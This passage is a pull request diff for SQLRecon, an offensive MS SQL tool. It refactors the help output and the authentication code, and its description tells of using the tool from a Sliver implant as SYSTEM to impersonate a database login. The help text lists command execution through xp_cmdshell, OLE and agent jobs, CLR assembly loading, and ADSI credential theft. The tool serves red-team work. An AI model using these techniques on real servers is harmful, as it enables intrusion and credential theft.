-            table.AddRow("\t[*] lDisableOle /l:LINKED_HOST", "|", "Disable OLE automation procedures");
-            table.AddRow("\t[*] lOleCmd /l:LINKED_HOST /c:COMMAND", "|", "Execute a system command using OLE automation procedures");
-            table.AddRow("\t[*] lEnableClr /l:LINKED_HOST", "|", "Enable CLR integration");
-            table.AddRow("\t[*] lDisableClr /l:LINKED_HOST", "|", "Disable CLR integration");
-            table.AddRow("\t[*] lClr /l:LINKED_HOST /dll:DLL /function:FUNCTION", "|", "Load and execute a .NET assembly in a custom stored procedure");
-            table.AddRow("\t[*] lAgentStatus /l:LINKED_HOST", "|", "Display if SQL agent is running and obtain agent jobs");
-            table.AddRow("\t[*] lAgentCmd /l:LINKED_HOST /c:COMMAND", "|", "Execute a system command using agent jobs");
-            table.AddRow("\t[*] lAdsi /l:LINKED_HOST /rhost:ADSI_SERVER_NAME /lport:LDAP_SERVER_PORT", "|", "Obtain cleartext ADSI credentials from a double-linked ADSI server");
-            table.Print();
-
-            Console.WriteLine("");
-            Console.WriteLine("--------------------------------------------------------------------------------------------------------------------------------------");
-            Console.WriteLine("\tImpersonation Modules (/m:, /module:) are executed against a single instance of SQL server using impersonation (/i:, /iuser:):");
-            Console.WriteLine("--------------------------------------------------------------------------------------------------------------------------------------");
-
-            table = new TablePrinter("", "", "");
-            table.AddRow("\tiQuery /i:IMPERSONATE_USER /c:QUERY", "|", "Execute a SQL query");
-            table.AddRow("\tiWhoami /i:IMPERSONATE_USER", "|", "Display what user you are logged in as, mapped as and what roles exist");
-            table.AddRow("\tiUsers /i:IMPERSONATE_USER", "|", "Display what user accounts and groups can authenticate against the database");
-            table.AddRow("\tiDatabases /i:IMPERSONATE_USER", "|", "Display all databases");
-            table.AddRow("\tiTables /i:IMPERSONATE_USER /db:DATABASE", "|", "Display all tables in the supplied database");
-            table.AddRow("\tiColumns /i:IMPERSONATE_USER /db:DATABASE /table:TABLE", "|", "Show all columns in the database and table you specify");
-            table.AddRow("\tiRows /i:IMPERSONATE_USER /db:DATABASE /table:TABLE", "|", "Display the number of rows in the database and table you specify");
-            table.AddRow("\tiSearch /i:IMPERSONATE_USER /keyword:KEYWORD", "|", "Search column names in the supplied table of the database you are connected to");
-            table.AddRow("\tiLinks /i:IMPERSONATE_USER", "|", "Enumerate linked SQL servers");
-            table.AddRow("\tiCheckRpc /i:IMPERSONATE_USER", "|", "Obtain a list of linked servers and their RPC status");
-            table.AddRow("\t[*] iEnableRpc /i:IMPERSONATE_USER /rhost:LINKED_HOST", "|", "Enable RPC and RPC out on a linked server");
-            table.AddRow("\t[*] iDisableRpc /i:IMPERSONATE_USER /rhost:LINKED_HOST", "|", "Disable RPC and RPC out on a linked server");
-            table.AddRow("\t[*] iEnableXp /i:IMPERSONATE_USER", "|", "Enable xp_cmdshell");
-            table.AddRow("\t[*] iDisableXp /i:IMPERSONATE_USER", "|", "Disable xp_cmdshell");
-            table.AddRow("\t[*] iXpCmd /i:IMPERSONATE_USER /c:COMMAND", "|", "Execute a system command using xp_cmdshell");
-            table.AddRow("\t[*] iEnableOle /i:IMPERSONATE_USER", "|", "Enable OLE automation procedures");
-            table.AddRow("\t[*] iDisableOle /i:IMPERSONATE_USER", "|", "Disable OLE automation procedures");
-            table.AddRow("\t[*] iOleCmd /i:IMPERSONATE_USER /c:COMMAND", "|", "Execute a system command using OLE automation procedures");
-            table.AddRow("\t[*] iEnableClr /i:IMPERSONATE_USER", "|", "Enable CLR integration");
-            table.AddRow("\t[*] iDisableClr /i:IMPERSONATE_USER", "|", "Disable CLR integration");
-            table.AddRow("\t[*] iClr /i:IMPERSONATE_USER /dll:DLL /function:FUNCTION", "|", "Load and execute a .NET assembly in a custom stored procedure");
-            table.AddRow("\t[*] iAgentStatus /i:IMPERSONATE_USER", "|", "Display if SQL agent is running and obtain agent jobs");
-            table.AddRow("\t[*] iAgentCmd /i:IMPERSONATE_USER /c:COMMAND", "|", "Execute a system command using agent jobs");
-            table.AddRow("\t[*] iAdsi /i:IMPERSONATE_USER /rhost:ADSI_SERVER_NAME /lport:LDAP_SERVER_PORT", "|", "Obtain cleartext ADSI credentials from a linked ADSI server");
-            table.Print();
-
-            Console.WriteLine("");
-            Console.WriteLine("-----------------------------------------------------------------------------");
+            Console.WriteLine("------------------------------------------------------------------------------------------------------------");
             Console.WriteLine("\tSCCM Modules (/m:, /module:) execute SCCM database-specific commands:");
-            Console.WriteLine("-----------------------------------------------------------------------------");
+            Console.WriteLine("------------------------------------------------------------------------------------------------------------");
 
             table = new TablePrinter("", "", "");
             table.AddRow("\tsDatabases", "|", "Display all SCCM databases");

--- a/SQLRecon/SQLRecon/utilities/PrintUtils.cs
+++ b/SQLRecon/SQLRecon/utilities/PrintUtils.cs
@@ -85,12 +85,12 @@ namespace SQLRecon.Utilities
         {
             if (print == true)
             {
-                Console.WriteLine(string.Format("[X] ERROR: {0}", sqlOutput));
+                Console.WriteLine(string.Format("[X] {0}", sqlOutput));
                 return "";
             }
             else
             {
-                return string.Format("[X] ERROR: {0}", sqlOutput);
+                return string.Format("[X] {0}", sqlOutput);
             }
         }
 
@@ -127,12 +127,12 @@ namespace SQLRecon.Utilities
         {
             if (print == true)
             {
-                Console.WriteLine(string.Format("[+] SUCCESS: {0}", sqlOutput));
+                Console.WriteLine(string.Format("[+] {0}", sqlOutput));
                 return "";
             }
             else
             {
-                return string.Format("[+] SUCCESS: {0}", sqlOutput);
+                return string.Format("[+] {0}", sqlOutput);
             }
         }
 

--- a/SQLRecon/SQLRecon/utilities/PrintUtils.cs
+++ b/SQLRecon/SQLRecon/utilities/PrintUtils.cs
@@ -2,28 +2,19 @@
 using System.Collections.Generic;
 using System.Linq;
 
+
 namespace SQLRecon.Utilities
 {
     internal class PrintUtils
     {
-        /// <summary>
-        /// The Debug method adds a debug message to the beginning
-        /// of a provided string.
-        /// </summary>
-        /// <param name="sqlOutput"></param>
-        /// <param name="print">If set to true, write the string to console,
-        /// otherwise, return the modified string.</param>
-        /// <returns></returns>
-        public string Debug(string sqlOutput, bool print = false)
+        private static readonly SQLRecon.Commands.GlobalVariables _gV = new();
+        private static readonly bool _debug = _gV.Debug;
+
+        public void Debug(string sqlOutput)
         {
-            if (print == true)
+            if (_debug == true)
             {
-                Console.WriteLine(string.Format("[*] DEBUG: {0}", sqlOutput));
-                return "";
-            }
-            else
-            {
-                return string.Format("[*] DEBUG: {0}", sqlOutput);
+                Console.WriteLine(string.Format("[i] {0}", sqlOutput));
             }
         }
 

--- a/SQLRecon/SQLRecon/utilities/SQLAuthentication.cs
+++ b/SQLRecon/SQLRecon/utilities/SQLAuthentication.cs
@@ -37,7 +37,7 @@ namespace SQLRecon.Utilities
             {
                 _connectionString = string.Format("Server={0}; Database={1}; Integrated Security=True;", sqlServer, database);
                 return _authenticateToDatabase(_connectionString, string.Format("{0}\\{1}", domain, user), sqlServer);
-            } 
+            }
         }
 
         /// <summary>
@@ -56,7 +56,7 @@ namespace SQLRecon.Utilities
         }
 
         /// <summary>
-        /// The AzureADAuthentication method uses cleartext Azure AD domain credentials 
+        /// The AzureADAuthentication method uses cleartext Azure AD domain credentials
         /// to authenticate to a supplied database.
         /// </summary>
         /// <param name="sqlServer"></param>
@@ -75,7 +75,7 @@ namespace SQLRecon.Utilities
         }
 
         /// <summary>
-        /// The AzureLocationAuthentication method uses cleartext Azure local database credentials 
+        /// The AzureLocationAuthentication method uses cleartext Azure local database credentials
         /// to authenticate to a supplied database.
         /// </summary>
         /// <param name="sqlServer"></param>
@@ -103,11 +103,20 @@ namespace SQLRecon.Utilities
         /// </returns>
         private SqlConnection _authenticateToDatabase(string conString, string user, string sqlServer)
         {
-            SqlConnection connection = new SqlConnection(conString);
+            SqlConnection connection = new SqlConnection($"{conString} Connect Timeout=4;");
 
             try
             {
                 connection.Open();
+                _print.Status("Connection information", true);
+                _print.Nested($"DataSource: {connection.DataSource}", true);
+                _print.Nested($"Database: {connection.Database}", true);
+                _print.Nested($"ServerVersion: {connection.ServerVersion}", true);
+                _print.Nested($"State: {connection.State}", true);
+                _print.Nested($"WorkstationId: {connection.WorkstationId}", true);
+                _print.Nested($"PacketSize: {connection.PacketSize}", true);
+                _print.Nested($"ClientConnectionId: {connection.ClientConnectionId}", true);
+                _print.Nested($"ApplicationName: {connection.WorkstationId}", true);
                 return connection;
             }
 
@@ -125,7 +134,7 @@ namespace SQLRecon.Utilities
                 {
                     _print.Error("Unable to load adal.sql or adalsql.dll.", true);
                 }
-                else 
+                else
                 {
                     _print.Error(string.Format("{0} can not log in to {1}.", user, sqlServer.Replace(",", ":")), true);
                     Console.WriteLine(ex);

--- a/SQLRecon/SQLRecon/utilities/SQLAuthentication.cs
+++ b/SQLRecon/SQLRecon/utilities/SQLAuthentication.cs
@@ -108,7 +108,6 @@ namespace SQLRecon.Utilities
             try
             {
                 connection.Open();
-                _print.Status("Connection information", true);
                 _print.Nested($"DataSource: {connection.DataSource}", true);
                 _print.Nested($"Database: {connection.Database}", true);
                 _print.Nested($"ServerVersion: {connection.ServerVersion}", true);

--- a/SQLRecon/SQLRecon/utilities/SetAuthenticationType.cs
+++ b/SQLRecon/SQLRecon/utilities/SetAuthenticationType.cs
@@ -1,4 +1,5 @@
-﻿using System.Collections.Generic;
+﻿using System;
+using System.Collections.Generic;
 using System.Data.SqlClient;
 using SQLRecon.Commands;
 
@@ -10,6 +11,7 @@ namespace SQLRecon.Utilities
         private static readonly PrintUtils _print = new();
         private static readonly SqlAuthentication _sqlAuthentication = new();
 
+
         /// <summary>
         /// The EvaluateAuthenticationType method is responsible for creating
         /// a SQL connection object. This object is used by SQLRecon to manage
@@ -19,109 +21,103 @@ namespace SQLRecon.Utilities
         /// <param name="argumentDictionary">User supplied command line arguments.</param>
         public static bool EvaluateAuthenticationType(Dictionary<string, string> argumentDictionary)
         {
-            if (argumentDictionary["auth"].ToLower().Equals("wintoken"))
+            // Set the default authentication type to "wintoken" if not provided
+            string auth = argumentDictionary.ContainsKey("auth") ? argumentDictionary["auth"].ToLower() : "wintoken";
+            string host = argumentDictionary.ContainsKey("host") ? argumentDictionary["host"] : null;
+            string module = argumentDictionary.ContainsKey("module") ? argumentDictionary["module"] : null;
+            string database = argumentDictionary.ContainsKey("database") ? argumentDictionary["database"] : null;
+            string port = argumentDictionary.ContainsKey("port") ? argumentDictionary["port"] : "1433";
+            string domain = argumentDictionary.ContainsKey("domain") ? argumentDictionary["domain"] : null;
+            string username = argumentDictionary.ContainsKey("username") ? argumentDictionary["username"] : null;
+            string password = argumentDictionary.ContainsKey("password") ? argumentDictionary["password"] : null;
+
+            return auth switch
             {
-                return _winToken(argumentDictionary);
-            }
-            else if (argumentDictionary["auth"].ToLower().Equals("windomain"))
-            {
-                return _winDomain(argumentDictionary);
-            }
-            else if (argumentDictionary["auth"].ToLower().Equals("local"))
-            {
-                return _local(argumentDictionary);
-            }
-            else if (argumentDictionary["auth"].ToLower().Equals("azuread"))
-            {
-                return _azureAd(argumentDictionary);
-            }
-            else if (argumentDictionary["auth"].ToLower().Equals("azurelocal"))
-            {
-                return _azureLocal(argumentDictionary);
-            }
-            else
-            {
-                return false;
-            }
+                "wintoken" => _winToken(auth, host, module, database, port),
+                "windomain" => _winDomain(auth, host, module, domain, username, password, database, port),
+                "local" => _local(auth, host, module, username, password, database, port),
+                "azuread" => _azureAd(auth, host, module, domain, username, password, database, port),
+                "azurelocal" => _azureLocal(auth, host, module, username, password, database, port),
+                _ => false,
+            };
         }
 
         /// <summary>
         /// The CreateSqlConnectionObject method creates a SQL connection object.
-        /// This method can be particularily useful if you want to create multiple SQL connection objects.
-        /// A single SQL connection object will only allow once instance of a 'SqlDataReader'.
+        /// This method can be particularly useful if you want to create multiple SQL connection objects.
+        /// A single SQL connection object will only allow one instance of a 'SqlDataReader'.
         /// If you are writing a module where you need to execute multiple SQL queries against a database
         /// at the exact same time, then this module will facilitate that.
         /// </summary>
-        /// <returns></returns>
+        /// <returns>A SQL connection object based on the current authentication type, or null if the authentication type is invalid.</returns>
         public static SqlConnection CreateSqlConnectionObject()
         {
-            if (_gV.AuthenticationType.Equals("wintoken"))
+            try
             {
-                return _sqlAuthentication.WindowsToken(_gV.SqlServer + "," + _gV.Port, _gV.Database);
+                SqlConnection connection = null;
+                string serverInfo = $"{_gV.SqlServer},{_gV.Port}";
+                string authType = _gV.AuthenticationType.ToLower();
+
+                switch (authType)
+                {
+                    case "wintoken":
+                        connection = _sqlAuthentication.WindowsToken(serverInfo, _gV.Database);
+                        break;
+                    case "windomain":
+                        connection = _sqlAuthentication.WindowsDomain(serverInfo, _gV.Database, _gV.Domain, _gV.Username, _gV.Password);
+                        break;
+                    case "local":
+                        connection = _sqlAuthentication.LocalAuthentication(serverInfo, _gV.Database, _gV.Username, _gV.Password);
+                        break;
+                    case "azuread":
+                        connection = _sqlAuthentication.AzureADAuthentication(serverInfo, _gV.Database, _gV.Domain, _gV.Username, _gV.Password);
+                        break;
+                    case "azurelocal":
+                        connection = _sqlAuthentication.AzureLocalAuthentication(serverInfo, _gV.Database, _gV.Username, _gV.Password);
+                        break;
+                    default:
+                        _print.Warning("Invalid authentication type specified.", true);
+                        return null;
+                }
+
+                if (connection != null)
+                {
+                    _print.Success($"SQL connection created using {_gV.AuthenticationType} on {_gV.SqlServer}:{_gV.Port} for {_gV.Database}.", true);
+                }
+                return connection;
             }
-            else if (_gV.AuthenticationType.Equals("windomain"))
+            catch (Exception ex)
             {
-                return _sqlAuthentication.WindowsDomain(_gV.SqlServer + "," + _gV.Port,
-                    _gV.Database,
-                    _gV.Domain,
-                    _gV.Username,
-                    _gV.Password);
-            }
-            else if (_gV.AuthenticationType.Equals("local"))
-            {
-                return _sqlAuthentication.LocalAuthentication(_gV.SqlServer + "," + _gV.Port,
-                        _gV.Database,
-                        _gV.Username,
-                        _gV.Password);
-            }
-            else if (_gV.AuthenticationType.Equals("azuread"))
-            {
-                return _sqlAuthentication.AzureADAuthentication(_gV.SqlServer + "," + _gV.Port,
-                        _gV.Database,
-                        _gV.Domain,
-                        _gV.Username,
-                        _gV.Password);
-            }
-            else if (_gV.AuthenticationType.Equals("azurelocal"))
-            {
-                return _sqlAuthentication.AzureLocalAuthentication(_gV.SqlServer + "," + _gV.Port,
-                        _gV.Database,
-                        _gV.Username,
-                        _gV.Password);
-            }
-            else
-            {
-                // This case should never get hit, but if it does, return nothing.
+                _print.Error($"An error occurred while creating the SQL connection object: {ex.Message}", true);
                 return null;
             }
         }
 
-
         /// <summary>
         /// The _winToken method is called if the authentication type is WinToken.
-        /// This requires a SQL server and module otherwise an error message is displayed.
+        /// This requires a SQL server and module; otherwise, an error message is displayed.
         /// </summary>
-        /// <param name="argumentDictionary"></param>
-        /// <returns></returns>
-        private static bool _winToken(Dictionary<string, string> argumentDictionary)
+        /// <param name="auth">Authentication type.</param>
+        /// <param name="host">SQL server host. If not provided, the current machine name is used.</param>
+        /// <param name="module">Module name. This is required.</param>
+        /// <param name="database">Optional database name.</param>
+        /// <param name="port">Optional port number, defaults to 1433 if not provided.</param>
+        /// <returns>True if the connection is successfully created, false otherwise.</returns>
+        private static bool _winToken(string auth, string host, string module, string database = null, string port = "1433")
         {
-            if (argumentDictionary["auth"].ToLower().Equals("wintoken") &&
-                argumentDictionary.ContainsKey("host") && argumentDictionary.ContainsKey("module"))
+            if (auth.ToLower().Equals("wintoken") && !string.IsNullOrEmpty(module))
             {
-                _gV.AuthenticationType = argumentDictionary["auth"].ToLower();
-                _gV.SqlServer = argumentDictionary["host"];
+                _gV.AuthenticationType = auth.ToLower();
+                _gV.SqlServer = !string.IsNullOrEmpty(host) ? host : System.Environment.MachineName;
 
                 // Optional argument for database
-                if (argumentDictionary.ContainsKey("database"))
+                if (!string.IsNullOrEmpty(database))
                 {
-                    _gV.Database = argumentDictionary["database"].ToLower();
+                    _gV.Database = database.ToLower();
                 }
 
-                // Optional argument for port, defaults to 1433
-                if (argumentDictionary.ContainsKey("port"))
-                {
-                    _gV.Port = argumentDictionary["port"];
-                }
+                // Set port, defaulting to 1433 if not provided
+                _gV.Port = port;
 
                 // Create the SQL connection object
                 _gV.Connect = CreateSqlConnectionObject();
@@ -129,7 +125,7 @@ namespace SQLRecon.Utilities
             }
             else
             {
-                _print.Error("Must supply a SQL server (/h:, /host:) and module (/m:, /module:).", true);
+                _print.Error("Must supply a module (/m:, /module:).", true);
                 // Go no further
                 return false;
             }
@@ -137,180 +133,185 @@ namespace SQLRecon.Utilities
 
         /// <summary>
         /// The _winDomain method is called if the authentication type is WinDomain.
-        /// This requires a SQL server, domain, username, password and module
-        /// otherwise an error message is displayed.
+        /// This requires a SQL server, domain, username, password, and module;
+        /// otherwise, an error message is displayed.
         /// </summary>
-        /// <param name="argumentDictionary"></param>
-        /// <returns></returns>
-        private static bool _winDomain(Dictionary<string, string> argumentDictionary)
+        /// <param name="auth">Authentication type.</param>
+        /// <param name="host">SQL server host. If not provided, the current machine name is used.</param>
+        /// <param name="module">Module name. This is required.</param>
+        /// <param name="domain">Domain name. This is required.</param>
+        /// <param name="username">Username. This is required.</param>
+        /// <param name="password">Password. This is required.</param>
+        /// <param name="database">Optional database name.</param>
+        /// <param name="port">Optional port number, defaults to 1433 if not provided.</param>
+        /// <returns>True if the connection is successfully created, false otherwise.</returns>
+        private static bool _winDomain(string auth, string host, string module, string domain, string username, string password, string database = null, string port = "1433")
         {
-            if (argumentDictionary["auth"].ToLower().Equals("windomain") && argumentDictionary.ContainsKey("host") &&
-                argumentDictionary.ContainsKey("domain") && argumentDictionary.ContainsKey("username") &&
-                argumentDictionary.ContainsKey("password") && argumentDictionary.ContainsKey("module"))
+            if (auth.ToLower().Equals("windomain") && !string.IsNullOrEmpty(module) && !string.IsNullOrEmpty(domain) && !string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(password))
             {
-                _gV.AuthenticationType = argumentDictionary["auth"].ToLower();
-                _gV.SqlServer = argumentDictionary["host"];
-                _gV.Domain = argumentDictionary["domain"];
-                _gV.Username = argumentDictionary["username"];
-                _gV.Password = argumentDictionary["password"];
+                _gV.AuthenticationType = auth.ToLower();
+                _gV.SqlServer = !string.IsNullOrEmpty(host) ? host : System.Environment.MachineName;
+                _gV.Domain = domain;
+                _gV.Username = username;
+                _gV.Password = password;
 
-                // Optional arg for database.
-                if (argumentDictionary.ContainsKey("database"))
+                // Optional argument for database
+                if (!string.IsNullOrEmpty(database))
                 {
-                    _gV.Database = argumentDictionary["database"].ToLower();
+                    _gV.Database = database.ToLower();
                 }
 
-                // Optional argument for port, defaults to 1433
-                if (argumentDictionary.ContainsKey("port"))
-                {
-                    _gV.Port = argumentDictionary["port"];
-                }
+                // Set port, defaulting to 1433 if not provided
+                _gV.Port = port;
 
-                // Create the SQL connection object.
+                // Create the SQL connection object
                 _gV.Connect = CreateSqlConnectionObject();
                 return true;
             }
             else
             {
-                _print.Error("Must supply a SQL server (/h:, /host:), domain (/d:, /domain:), username (/u:, /username:), " +
-                    "password (/p: /password:) and module (/m:, /module:).", true);
-                // Go no further.
+                _print.Error("Must supply a domain (/d:, /domain:), username (/u:, /username:), password (/p: /password:) and module (/m:, /module:).", true);
+                // Go no further
                 return false;
             }
         }
 
         /// <summary>
         /// The _local method is called if the authentication type is Local.
-        /// This requires a SQL server, username, password, and module
-        /// otherwise an error message is displayed.
+        /// This requires a SQL server, username, password, and module;
+        /// otherwise, an error message is displayed.
         /// </summary>
-        /// <param name="argumentDictionary"></param>
-        /// <returns></returns>
-        private static bool _local(Dictionary<string, string> argumentDictionary)
+        /// <param name="auth">Authentication type.</param>
+        /// <param name="host">SQL server host. If not provided, the current machine name is used.</param>
+        /// <param name="module">Module name. This is required.</param>
+        /// <param name="username">Username. This is required.</param>
+        /// <param name="password">Password. This is required.</param>
+        /// <param name="database">Optional database name.</param>
+        /// <param name="port">Optional port number, defaults to 1433 if not provided.</param>
+        /// <returns>True if the connection is successfully created, false otherwise.</returns>
+        private static bool _local(string auth, string host, string module, string username, string password, string database = null, string port = "1433")
         {
-            if (argumentDictionary["auth"].ToLower().Equals("local") && argumentDictionary.ContainsKey("host") &&
-                argumentDictionary.ContainsKey("username") && argumentDictionary.ContainsKey("password") &&
-                argumentDictionary.ContainsKey("module"))
+            if (auth.ToLower().Equals("local") && !string.IsNullOrEmpty(module) && !string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(password))
             {
-                _gV.AuthenticationType = argumentDictionary["auth"].ToLower();
-                _gV.SqlServer = argumentDictionary["host"];
-                _gV.Username = argumentDictionary["username"];
-                _gV.Password = argumentDictionary["password"];
+                _gV.AuthenticationType = auth.ToLower();
+                _gV.SqlServer = !string.IsNullOrEmpty(host) ? host : System.Environment.MachineName;
+                _gV.Username = username;
+                _gV.Password = password;
 
-                // Optional arg for database.
-                if (argumentDictionary.ContainsKey("database"))
+                // Optional argument for database
+                if (!string.IsNullOrEmpty(database))
                 {
-                    _gV.Database = argumentDictionary["database"].ToLower();
+                    _gV.Database = database.ToLower();
                 }
 
-                // Optional argument for port, defaults to 1433.
-                if (argumentDictionary.ContainsKey("port"))
-                {
-                    _gV.Port = argumentDictionary["port"];
-                }
+                // Set port, defaulting to 1433 if not provided
+                _gV.Port = port;
 
-                // Create the SQL connection object.
+                // Create the SQL connection object
                 _gV.Connect = CreateSqlConnectionObject();
                 return true;
             }
             else
             {
-                _print.Error("Must supply a SQL server (/h:, /host:), username (/u:, /username:), password (/p: /password:) and module (/m:, /module:).", true);
-                // Go no further.
+                _print.Error("Must supply an username (/u:, /username:), password (/p: /password:) and module (/m:, /module:).", true);
+                // Go no further
                 return false;
             }
         }
 
         /// <summary>
         /// The _azureAd method is called if the authentication type is AzureAD.
-        /// This requires a SQL server, domain, username, password and module
-        /// otherwise an error message is displayed.
+        /// This requires a SQL server, domain, username, password, and module;
+        /// otherwise, an error message is displayed.
         /// </summary>
-        /// <param name="argumentDictionary"></param>
-        /// <returns></returns>
-        private static bool _azureAd(Dictionary<string, string> argumentDictionary)
+        /// <param name="auth">Authentication type.</param>
+        /// <param name="host">SQL server host. If not provided, the current machine name is used.</param>
+        /// <param name="module">Module name. This is required.</param>
+        /// <param name="domain">Domain name. This is required.</param>
+        /// <param name="username">Username. This is required.</param>
+        /// <param name="password">Password. This is required.</param>
+        /// <param name="database">Optional database name.</param>
+        /// <param name="port">Optional port number, defaults to 1433 if not provided.</param>
+        /// <returns>True if the connection is successfully created, false otherwise.</returns>
+        private static bool _azureAd(string auth, string host, string module, string domain, string username, string password, string database = null, string port = "1433")
         {
-            if (argumentDictionary["auth"].ToLower().Equals("azuread") && argumentDictionary.ContainsKey("host") &&
-                argumentDictionary.ContainsKey("domain") && argumentDictionary.ContainsKey("username") &&
-                argumentDictionary.ContainsKey("password") && argumentDictionary.ContainsKey("module"))
+            if (auth.ToLower().Equals("azuread") && !string.IsNullOrEmpty(module) && !string.IsNullOrEmpty(domain) && !string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(password))
             {
-                if (!argumentDictionary["domain"].Contains("."))
+                if (!domain.Contains("."))
                 {
                     _print.Error("Domain (/d:, /domain:) must be the fully qualified domain name (domain.com).", true);
-                    // Go no further.
+                    // Go no further
                     return false;
                 }
                 else
                 {
-                    _gV.AuthenticationType = argumentDictionary["auth"].ToLower();
-                    _gV.SqlServer = argumentDictionary["host"];
-                    _gV.Domain = argumentDictionary["domain"];
-                    _gV.Username = argumentDictionary["username"];
-                    _gV.Password = argumentDictionary["password"];
+                    _gV.AuthenticationType = auth.ToLower();
+                    _gV.SqlServer = !string.IsNullOrEmpty(host) ? host : System.Environment.MachineName;
+                    _gV.Domain = domain;
+                    _gV.Username = username;
+                    _gV.Password = password;
 
-                    // Optional arg for database.
-                    if (argumentDictionary.ContainsKey("database"))
+                    // Optional argument for database
+                    if (!string.IsNullOrEmpty(database))
                     {
-                        _gV.Database = argumentDictionary["database"].ToLower();
+                        _gV.Database = database.ToLower();
                     }
 
-                    // Optional argument for port, defaults to 1433.
-                    if (argumentDictionary.ContainsKey("port"))
-                    {
-                        _gV.Port = argumentDictionary["port"];
-                    }
+                    // Set port, defaulting to 1433 if not provided
+                    _gV.Port = port;
 
-                    // Create the SQL connection object.
+                    // Create the SQL connection object
                     _gV.Connect = CreateSqlConnectionObject();
                     return true;
                 }
             }
             else
             {
-                _print.Error("Must supply a SQL server (/h:, /host:), domain (/d:, /domain:), username (/u:, /username:), password (/p: /password:) and module (/m:, /module:).", true);
-                // Go no further.
+                _print.Error("Must supply a domain (/d:, /domain:), username (/u:, /username:), password (/p: /password:) and module (/m:, /module:).", true);
+                // Go no further
                 return false;
             }
         }
 
         /// <summary>
         /// The _azureLocal method is called if the authentication type is AzureLocal.
-        /// This requires a SQL server, username, password and module
-        /// otherwise an error message is displayed.
+        /// This requires a SQL server, username, password, and module;
+        /// otherwise, an error message is displayed.
         /// </summary>
-        /// <param name="argumentDictionary"></param>
-        /// <returns></returns>
-        private static bool _azureLocal(Dictionary<string, string> argumentDictionary)
+        /// <param name="auth">Authentication type.</param>
+        /// <param name="host">SQL server host. If not provided, the current machine name is used.</param>
+        /// <param name="module">Module name. This is required.</param>
+        /// <param name="username">Username. This is required.</param>
+        /// <param name="password">Password. This is required.</param>
+        /// <param name="database">Optional database name.</param>
+        /// <param name="port">Optional port number, defaults to 1433 if not provided.</param>
+        /// <returns>True if the connection is successfully created, false otherwise.</returns>
+        private static bool _azureLocal(string auth, string host, string module, string username, string password, string database = null, string port = "1433")
         {
-            if (argumentDictionary["auth"].ToLower().Equals("azurelocal") && argumentDictionary.ContainsKey("host") &&
-                argumentDictionary.ContainsKey("username") && argumentDictionary.ContainsKey("password") &&
-                argumentDictionary.ContainsKey("module"))
+            if (auth.ToLower().Equals("azurelocal") && !string.IsNullOrEmpty(module) && !string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(password))
             {
-                _gV.AuthenticationType = argumentDictionary["auth"].ToLower();
-                _gV.SqlServer = argumentDictionary["host"];
-                _gV.Username = argumentDictionary["username"];
-                _gV.Password = argumentDictionary["password"];
+                _gV.AuthenticationType = auth.ToLower();
+                _gV.SqlServer = !string.IsNullOrEmpty(host) ? host : System.Environment.MachineName;
+                _gV.Username = username;
+                _gV.Password = password;
 
-                // Optional arg for database.
-                if (argumentDictionary.ContainsKey("database"))
+                // Optional argument for database
+                if (!string.IsNullOrEmpty(database))
                 {
-                    _gV.Database = argumentDictionary["database"].ToLower();
+                    _gV.Database = database.ToLower();
                 }
 
-                // Optional argument for port, defaults to 1433.
-                if (argumentDictionary.ContainsKey("port"))
-                {
-                    _gV.Port = argumentDictionary["port"];
-                }
+                // Set port, defaulting to 1433 if not provided
+                _gV.Port = port;
 
-                // Create the SQL connection object.
+                // Create the SQL connection object
                 _gV.Connect = CreateSqlConnectionObject();
                 return true;
             }
-            else 
+            else
             {
-                _print.Error("Must supply a SQL server (/h:, /host:), username (/u:, /username:), password (/p: /password:) and module (/m:, /module:).", true);
-                // Go no further.
+                _print.Error("Must supply a username (/u:, /username:), password (/p: /password:) and module (/m:, /module:).", true);
+                // Go no further
                 return false;
             }
         }

--- a/SQLRecon/SQLRecon/utilities/SetAuthenticationType.cs
+++ b/SQLRecon/SQLRecon/utilities/SetAuthenticationType.cs
@@ -58,6 +58,8 @@ namespace SQLRecon.Utilities
                 string serverInfo = $"{_gV.SqlServer},{_gV.Port}";
                 string authType = _gV.AuthenticationType.ToLower();
 
+                _print.Status($"Connecting to MS SQL instance using {_gV.AuthenticationType} on {_gV.SqlServer}:{_gV.Port} for {_gV.Database}.", true);
+
                 switch (authType)
                 {
                     case "wintoken":
@@ -78,11 +80,6 @@ namespace SQLRecon.Utilities
                     default:
                         _print.Warning("Invalid authentication type specified.", true);
                         return null;
-                }
-
-                if (connection != null)
-                {
-                    _print.Success($"SQL connection created using {_gV.AuthenticationType} on {_gV.SqlServer}:{_gV.Port} for {_gV.Database}.", true);
                 }
                 return connection;
             }

--- a/SQLRecon/SQLRecon/utilities/SetAuthenticationType.cs
+++ b/SQLRecon/SQLRecon/utilities/SetAuthenticationType.cs
@@ -60,6 +60,7 @@ namespace SQLRecon.Utilities
 
                 _print.Status($"Connecting to MS SQL instance using {_gV.AuthenticationType} on {_gV.SqlServer}:{_gV.Port} for {_gV.Database}.", true);
 
+
                 switch (authType)
                 {
                     case "wintoken":


### PR DESCRIPTION
Hi @skahwah 👋

I find the work you've done on this tool pretty consistent and since I found a few features missing, instead of awarding it minus points in my mind I decided to put in the work. I hope you appreciate the gesture and accept this Pull Request (PR), I had quite an evening! 

I want you to know that these modifications have enabled me to overcome certain challenges. Without them, the tool wouldn't have been able to do it.

## Context
You land into a machine as `NT AUTHORITY\SYSTEM` and you want to connect to the `MS MSQL` with your current windows token. 

Although you have no knowledge of `webapp01`'s credentials, you want to impersonate it. Logins that are members of the `sysadmin` role are mapped to `dbo` by default for all databases. This means they operate with full administrative permissions within every database, just as if they were the actual owners. 

Here, the `sqlservr.exe` service is ran by `NT AUTHORITY\SYSTEM`, you are basically `dbo`, you can impersonate anyone! Once migrated to this process, you are normally able to do whatever you want.

N.B. Of course, if `NT AUTHORITY\SYSTEM` is not the database owner or explicitly mapped to the `dbo` user, it won't have `dbo` privileges.

## Before
Currently, `SQLRecon` fails in this task because it doesn't take into account the fact that you are `sysadmin`.

- Enumeration of impersonable users:
```shell
sliver (NEUTRAL_WRAP) > execute-assembly /home/kali/backpack/winaries/csharp/SQLRecon-v3.3.exe /a:WinToken /h:SQL01 /m:impersonate

[*] Output:
[*] Enumerating accounts that can be impersonated on SQL01
[*] No logins can be impersonated.
```
- Impersonate someone
```shell
